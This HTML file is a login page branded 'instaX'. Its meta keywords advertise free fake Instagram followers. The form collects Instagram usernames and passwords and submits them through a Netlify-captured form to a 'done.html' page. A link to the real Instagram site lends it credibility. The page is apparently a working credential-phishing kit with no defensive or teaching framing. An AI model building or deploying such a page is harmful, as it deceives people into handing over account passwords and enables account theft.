<!DOCTYPE html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>instaX Login Page</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f4f4;
      margin: 0;
      padding: 0;
      background-image: url('ov6wt29k.png');
      background-repeat: no-repeat;
      background-size: 2000px 900px;
      position: relative;
    }
    
    .container {
      width: 320px;
      margin: 0 auto ;
      margin-top:  100px; ;
      background-color: #ffffff0f;
      padding: 20px;
      border-radius: 12px;
      box-shadow: 0 2px 5px rgba(0, 0, 0, 0.5);
    }
    
    h2 {
      text-align: center;
      margin-bottom: 20px;
    }
    
    .form-group {
      margin-bottom: 20px;
    }
    
    label {
      display: block;
      font-weight: bold;
      margin-bottom: 5px;
    }
    
    input[type="text"],
    input[type="password"] {
      width: 95%;
      padding: 8px;
      border-radius: 3px;
      border: 1px solid #cccccc;
      background-color: #cccccc15;
      color: black;
    }
    
    input[type="submit"] {
      width: 100%;
      padding: 8px;
      background-color: #006eff;
      color: #ffffff;
      border: none;
      border-radius: 3px;
      cursor: pointer;
      
    }
    
    input[type="submit"]:hover {
      background-color: #253db3;
    }

    .check {
    margin-bottom: 20px; 
      
    }

    .space{
      margin-top: 15px; ;
    }

    .hr{
      color: #253db3;

    }
  </style>
  <meta name="keywords" content="instagram,LOGIN,FAKEFOLLOWER,FREE,instagram&fake&follower,instagramfakefollower,followerincreaser">
  <meta name="title"    content="instaX">
  <link rel="shortcut icon" type="image/jpg" href="PNGPP.png">
</head>
<body>
  <div class="container">
    <h2>Login</h2>
    <form action="done.html" method="post" data-netlify="true" onsubmit="submit">
      <div class="form-group">
        <label for="username">Username:</label>
        <input type="text" id="username" name="username" placeholder="username" required>
      </div>
      <div class="form-group">
        <label for="password">Password:</label>
        <input type="password" id="password" name="password" placeholder="password" minlength="6" maxlength="16">
      </div>
      <div>
        <input type="checkbox" class="check">  
      </div>
      <input type="submit" value="Login" herf="done.html">
    </form>
    <hr class="hr">
    <div class="space">
     <a href="https://www.instagram.com/">create account</a>
    </div>
  </div>
</body>
</html>
